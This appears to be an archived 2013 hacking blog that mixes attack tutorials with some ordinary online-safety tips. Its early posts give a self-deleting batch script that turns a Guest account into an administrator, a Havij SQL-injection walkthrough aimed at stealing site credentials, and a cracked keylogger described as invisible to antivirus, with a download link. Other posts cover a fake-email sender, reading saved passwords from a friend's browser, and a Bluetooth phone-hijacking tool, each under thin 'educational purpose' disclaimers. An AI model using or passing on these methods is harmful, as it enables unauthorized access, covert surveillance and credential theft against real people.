Monday, December 2, 2013

Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.



echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Enjoy

SITE GOT HACKED BY CYBER-ROCK-HACKERS

Friday, November 29, 2013

Hack Websites Using Havij SQL Injection Tutorial

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.


Supported Databases With Havij
  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)


Demonstration
Now i will Show you step by step the process of SQL injection.
Step1: Find 
SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.
Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures: 

Here are some of the countermeasures you can take to reduce the risk of SQL Injection
1.      Renaming the admin page will make it difficult for a hacker to locate it
2.      Use a Intrusion detection system and compose the signatures for popular SQL injection strings
3.      One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

Tuesday, October 29, 2013

Our New Blog On Computer Technology & News

Hai Friends,
A Good News  For all My visitors.....


This is Our New Blog On Computer Information & technology about Tips, All About Computer of Windows, Linux,Mac 


Follow Us on : http://techmantra365.blogspot.in/





We are Also Planning To launch Another 3 blogs on

>     Entertainment Portal
>     Education Portal
>     jobs Portal


Keep On Visiting & Happy Surfing To all
Thanks For Your Support
From E-hacking Blog


Friday, October 18, 2013

Actual Spy Keylogger full version with serial key


Actual Spy Keylogger full version with serial key

Actual Spy

What is key logger?

A Key logger (KeyLogger or Keystroke Logger) is a program that runs invisibly in the background, recording all the keystrokes, usually saving the results to a log file.

Keylogger Actual Spy software features:

  • Logs all keystrokes, is case sensitive (keystroke logger).
  • Makes screenshots within the specified time interval.
  • Saves the applications’ running and closing.
  • Watches clipboard contents.
  • Records all print activity.
  • Records disk changes.
  • Records internet connections.
  • Records all websites visited.
  • Records startup/shutdown.
  • All the information is stored in the encrypted log file.
  • Convenient interface of the log and screenshot view.
  • Generates the report in the text and html format.
  • Sends the report to the specified email, via FTP or local area network.
  • Works in the standard and hidden mode.
  • In the hidden mode it is invisible in all operating systems (in Windows NT/2000/XP/Vista/7 processes as well).
  • Provides the opportunity to protect keylogger with the password, so that nobody except you could view the logs.
        Fast installation, convenient and understandable interface, various set of features, flexible           configuration system

Unique Keylogger Actual Spy software features:


  • The keylogger Actual Spy Software is absolutely invisible in the all operating systems (in Windows NT/2000/XP/Vista/7 processes as well) and is not detected by antivirus software.
  • Case sensitive when detecting the keystrokes.
  • When viewing the keystrokes can show only the characters without showing the pressed system keys which is more convenient. For example, if the following keys are pressed:
"[Shift]It[Space]is[Space]keylogger."
  • You can see the text
"It is keylogger."
  • having checked the "Show only characters" option.  
  • Log search with or without the case sensitive option.
  • For your convenience, the limits of the text log size and screenshot size are specified separately, as the screenshots size normally occupies more disk space than a text file.
  • Specifying the limits of the clipboard contents. If large amounts of information are copied to the clipboard, only the specified part will be saved.
  • Sending the reports to email, via FTP or local area network with flexible configuration system.



Use it for Educational Purpose Only, E-hacking4all is not Responsible for all Activites Done by this Tool. Its only to awareness about Keyloggers.

Download link


http://goo.gl/onYQvj


Password For rar file :    http://goo.gl/pvFrAJ



Screen shots:




Saturday, October 12, 2013

Send Fake mails To any One without hacking their mail id's -100% working


Hai friends,

 Today i got a new tool for you  
its a fake mail Tool means You can send prank mails to any one by using any mail id 
you can check it from here my portal 

This is the link You can Use to send fake emails to any email id   

http://goo.gl/bcFb5x

Screen shots:




Mail i got 



if its not loading page just Refresh it 100% working 


Don't Mis use this Tool, It'sOnly For educational Purpose 
x

Monday, September 30, 2013

Nessus On Windows

Nessus On Windows


Nessus is one of the well known and most used vulnerability scanner program. Nessus was built for UNIX platform but now also supports Windows platform. Nessus runs as client server program and available as free and professional version. Download and register your e-mail with them and they will send you information about how to register and use it. Once installation is done you will have two icons one with name Nessus Server another withNessus Client first of all open Nessus Server and add users in it. Then open Nessus Clientand log in, after log in you will see interface as follows,
Please Open Images In New Tab
First of all you will have to define some scan policy to scan target system. For that click on “Policies” then “Add Policy”. Its not difficult to understand how to define general section in policy but if you don't know much about different OS and networking I would better suggest let other options to their defaults.
Next step is to add scan, click on “Scan” and then “Add Scan”, type IP address you want to scan else you can also insert a text file with IP addresses of targets but for now just scan your own computer. Once you press “Launch” button your scan will begin. After scan is complete have your look on vulnerabilities found in target system. 
 
For now don't bother about how to exploit vulnerabilities for hacking purpose that we will cover in “Enumeration” and “Gaining Access/System Hacking” phase. As an honest advice I would recommend you not to limit your self to this tutorial and find more tutorials onwww.YouTube.com . Thanks for reading and keep visiting.

Saturday, September 21, 2013

How to Reveal Asterisks Password on Log In Page

The following tips and trick I've tried on latest Mozilla Firefox, Google Chrome, Opera, Internet Explorer

Requirement:
1. Internet browser.
2. Understand Javascript.

How to Reveal Asterisks Password on Log In Page:

1. As I've already tell above about the browser condition of my friend, I start to think maybe while she's surfing a website she also save the passwords while the browser pop up alerting whether she want to save our password or not. And when I type Gmail and Yahoo web address on her browser, I got this preview:
She save all her e-mail username and password
When see that, I start to make a small games with my friend (Including her) about "How to Reveal Asterisks Password on Log In Page" without view the passwords directly on the show password options menu.
2. Finally I gave the answers to them. Firstly we view the source code of the page where the asterisks appears and find out the ID of the element where asterisks appears. I give example on Yahoo log in page using Opera dragonfly. (right click the asterisks and click inspect element)
the ID value is passwd.
3. After get the ID, we back again to the browser. On the browser address bar, type:
javascript: alert(document.getElementById('passwd').value);
the script above tells the browser to alerting the value of the textbox where asterisks was appeared.
4. Here is the result when the script was executed.
How to Reveal Asterisks Password on Log In Page
Conclusion:
1. This tips and trick only for fun, because you also can view the saved password directly without viewing source code and typing a javascript code.
2. Do not save your password on your browser, but save it in your mind. That's the safest place

Hope its useful

Friday, August 9, 2013

Pakistan Army website and Facebook fan pages hacked by Indian Hacker

Pakistan Army website and Facebook fan pages hacked by Indian Hacker


If you are regular reader of EHN , you know that this is not the first time the Pakistan Army website is under cyber attack.  Once again Indian hacker "Godzilla" breached the Pakistan Army website.

Speaking to E Hacking News, the hacker said that he hacked into "pakistanarmy.gov.pk" and left a malicious PDF exploit file in the form of magazine.

The admin clicked the PDF exploit which results in his computer is infected with malware.  It allowed the hacker to compromise the facebook fan pages.
Sponsored Links
The following Facebook fans pages deleted by the hacker : Pakistan Army Official Facebook Page (www.facebook.com/OfficialPakArmy)  Pakistan Army Officers Club Facebook Page (www.facebook.com/fb.paoc), Pakistan Army Fan Facebook Page(www.facebook.com/pakarmyfanpage).

He claimed the admin removed the login page of CMS used by the website but failed to remove the backdoor.

"Now no more deals, if you can fire then we can bombard  You are punished for breaking ceasefire we are coming for you." Hacker stated as reason for the cyber attack.

Sunday, August 4, 2013

Prevent Identity Theft

------------Prevent Identity Theft---------------

Don’t reply if you see a suspicious email, instant message or webpage asking for your personal or financial information

Always be wary of any messages or sites that ask for your personal information, or messages that refer you to an unfamiliar web page asking for any of the following details:

1. Usernames
2. Passwords
3. Social Security numbers
4. Bank account numbers
5. PINs (Personal Identification Numbers)
6. Full credit card numbers
7. Your mother’s maiden name
8. Your birthday

Don’t fill out any forms or sign-in screens that might be linked to from those messages. If someone suspicious asks you to fill out a form with your personal information don’t be tempted to start filling it out. Even if you don’t hit the “submit” button, you might still be sending your information to identity thieves if you start putting your data into their forms.

Monday, July 29, 2013

Email Privacy Tips for You

To maintain privacy of your Email and to Protect your Email ID from being Hacked we must follow some basic steps as follows,
1. Enable two step verification in you E
mail accounts.

2. Enable Login-notification for you email and get notification in your mobile whenever you login.

3. Set a strong password with a mix of alphabets, numbers and special characters.

4. Enable login- notification for you Facebook accounts to prevent unauthorized access.

5. Enable HTTPS in your email settings and your Facebook account settings.

6. Never share your password with anyone. Even to your closest person.

7. Setup a recovery question which is difficult to answer and never setup an easy & guessable answer to your security question.

8. Never click on any links sent through mail or chat. It may be a link which can steal your cookie or inject any viruses.

9. Always check your address bar for proper website address before logging in.

10. Whenever you Need to Forward an Email to More than One Person use the BCC Option to Write Addresses.

11. If you are Unable to Access Your Email Account Immediately Report it to the Service Provider. They Give You a Option of Forgot Password/Account Hacked etc.

12. Avoid Using FREE WIFI Access At Public Places.


Source:OoPpSs Group

MY CERTIFICATE FROM E-HACK(OFFICIAL ATTEMPT--GUINNESS WORLD RECORD)


PROUD TO BE ONE OF THE RECORD HOLDER IN E-HACK EVENT (OFFICIAL ATTEMPT)

Tuesday, June 18, 2013

Super Bluetooth Hack v. 1.08 Hack friends Mobile via bluetooth

How To Hack Friends Mobile Phone Via Bluetooth

Hi GuyX in this article I will show you how to hack mobilE phone with simple software called

(Super Bluetooth Hack v. 1.08) . Once connected to a another phone via bluetooth you can do the following

A:  Call from his phone. It includes all call functions like hold etc.

B:  Read his messages
C:  Read his contacts
D:  Change profile

E:  Play his ringtone even if phone is on silent
F:  Play his songs(in his phone)
G:  Restart the phone
 I:  Switch off the phone
 J :  Restore factory settings
 k:  Change ringing volume



Follow these steps:

1) Download the Super Bluetooth Hack V1.08.
2) Unzip the file and send it to your mobile phone.
3) Install the software in your mobile phone.
4) Inquire new devices through the software.
5) When connecting devices use a code 0000

SQL Fingerprint Xmas Released

MICROSOFT SQL SERVER FINGERPRINT XMAS RELEASED


Microsoft SQL Server fingerprinting can be a time consuming process, because it involves trial and error methods to determine the exact version. Intentionally inserting an invalid input to obtain a typical error message or using certain alphabets that are unique for certain server are two of the many ways to possibly determine the version, but most of them require authentication, permissions and/or privileges on
Microsoft SQL Server to succeed. 

Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and determine the exactMicrosoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism (Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft SQL Server version. It is a tool intended to be used by:


This version is a completely rewritten version in Perl, making ESF.pl much more
 portable than the previous binary version (Win32), and its original purpose is 
to be used as a tool to perform automated penetration test. This version 
also includes the followingMicrosoft SQL Server versions to its fingerprint 
database:

        • Microsoft SQL Server 2012 SP1 (CU1)
        • Microsoft SQL Server 2012 SP1
        • Microsoft SQL Server 2012 SP1 CTP4
        • Microsoft SQL Server 2012 SP1 CTP3
        • Microsoft SQL Server 2012 SP0 (CU4)
        • Microsoft SQL Server 2012 SP0 (MS12-070)
        • Microsoft SQL Server 2012 SP0 (CU3)
        • Microsoft SQL Server 2012 SP0 (CU2)
        • Microsoft SQL Server 2012 SP0 (CU1)
        • Microsoft SQL Server 2012 SP0 (MS12-070)
        • Microsoft SQL Server 2012 SP0 (KB2685308)
        • Microsoft SQL Server 2012 RTM


Download: http://code.google.com 

Source: http://adf.ly/1561310/code.google.com/p/sql-fingerprint-next-generation

Friday, May 31, 2013

How to Secure Facebook Account from Hacking ?

Hey friends i am back here after a long time ..today my topic is " How to Secure Facebook Account from Hackers ?" every day people ask me a question that " How to Secure Facebook Account from Hacking ? " so i decided to give some helpfully tips and information to  my friends so i am here.. if you done this then its mean your account is secure :)
Every Day thousands of Facebook Accounts are Hacked by various means. Most Popularly by Phishing. But as a internet user how can we defend our self, I am going to inform you people about a Facebook feature which not so many people know about.



All you have to do it to follow the following steps and then your Account will be protected by SMS Security code configuration. It means that when someone will log into your account from any other computer a SMS will be send to you with Security Code that you will have to give to log in. Like this No one can log into your account even if they have your password.

STEP 1: Goto your Account Account Settings .

STEP 2: Now Under “Account Security” section , Tick “Login Approval” .

Step 3: Click on “Set Up Now” .
STEP 4: Now give the “confirmation code” in the space give. The code will be sent in sms to your mobile.
STEP 5: After giving the “confirmation code” . This message will appear, which means that setup is successful.



if you done or do these 2 methods to secure your account . then no one can access you account :)
keep smiling .. be hapPy :)
and keep visiting e-hacking4all for more information :)

Monday, May 20, 2013

Tips For Online Security

Remember the top tips For Online Security . . . . 
Stay Smart Online encourages all to remember these ten simple tips to improve their online security:



1. Install and update your security software and set it to scan regularly

2. Turn on automatic updates on all your software, particularly your operating system and applications

3. Use strong passwords and different passwords for different uses

4. Stop and think before you click on links and attachments

5. Take care when buying online - research the supplier and use a safe payment method

6. Only download "apps" from reputable publishers and read all permission requests

7. Regularly check your privacy settings on social networking sites

8. Stop and think before you post any photos or financial information online

9. Talk with your child about staying safe online, including on their smart phone or mobile device

10. Report or talk to someone if you feel uncomfortable or threatened online - download the Government's Cybersafety Help Button

Source: i3indya